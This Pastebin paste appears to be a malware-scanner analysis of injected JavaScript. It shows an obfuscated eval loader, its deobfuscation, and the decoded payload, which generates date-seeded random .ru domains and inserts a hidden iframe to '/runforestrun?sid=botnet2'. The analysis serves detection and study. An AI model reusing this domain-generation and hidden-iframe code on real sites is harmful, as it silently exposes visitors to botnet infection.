Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * Quttera web malware scanner detected malicious JavaScript code injecting hidden iframes to
- * multiple domains in *.ru area
- */
- /*
- * first obfuscation level
- */
- /*km0ae9gr6m*/window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,11 ... 8,34,34,41,59,102,111,114,40,59,49,55,55,54,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,91,102,114,43,40,40,101,41,63,34,67,111,100,101,34,58,49,50,41,93,40,40,119,91,106,93,47,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,125,10,105,102,40,102,41,101,40,115,41,59,125,10));/*qhk6sa6g1c*/
- /*
- * second obfuscation level
- */
- try {
- prototype % 2;
- } catch (asd) {
- x = 2;
- }
- try {
- q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
- q.appendChild(q + "");
- } catch (fwbewe) {
- i = 0;
- try {
- prototype * 5;
- } catch (z) {
- fr = "fromChar""eva";
- }
- if (v) e = window[v + "l"];
- w = f;
- s = [];
- r = String;
- z = ((e) ? "Code" : "");
- for (; 1776 - 5 + 5 > i; i += 1) {
- j = i;
- if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
- }
- if (f) e(s);
- }
- /*
- * decoded payload generate hidden iframes to "/runforestrun?sid=botnet2" query string
- * in random domains in *.ru area
- */
- function nextRandomNumber(){
- var hi = this.seed / this.Q;
- var lo = this.seed % this.Q;
- var test = this.A * lo - this.R * hi;
- if(test > 0){
- this.seed = test;
- } else {
- this.seed = test + this.M;
- }
- return (this.seed * this.oneOverM);
- }
- function RandomNumberGenerator(unix){
- var d = new Date(unix*1000);
- var s = d.getHours() > 12 ? 1 : 0;
- this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
- this.A = 48271;
- this.M = 2147483647;
- this.Q = this.M / this.A;
- this.R = this.M % this.A;
- this.oneOverM = 1.0 / this.M;
- this.next = nextRandomNumber;
- return this;
- }
- function createRandomNumber(r, Min, Max){
- return Math.round((Max-Min) * r.next() + Min);
- }
- function generatePseudoRandomString(unix, length, zone){
- var rand = new RandomNumberGenerator(unix);
- var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
- var str = '';
- for(var i = 0; i < length; i ++ ){
- str += letters[createRandomNumber(rand, 0, letters.length - 1)];
- }
- return str + '.' + zone;
- }
- setTimeout(function(){
- try{
- if(typeof iframeWasCreated == "undefined"){
- iframeWasCreated = true;
- var unix = Math.round(+new Date()/1000);
- var domainName = generatePseudoRandomString(unix, 16, 'ru');
- ifrm = document.createElement("IFRAME");
- ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2");
- ifrm.style.width = "0px";
- ifrm.style.height = "0px";
- ifrm.style.visibility = "hidden";
- document.body.appendChild(ifrm);
- }
- }catch(e){}
- }, 500);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement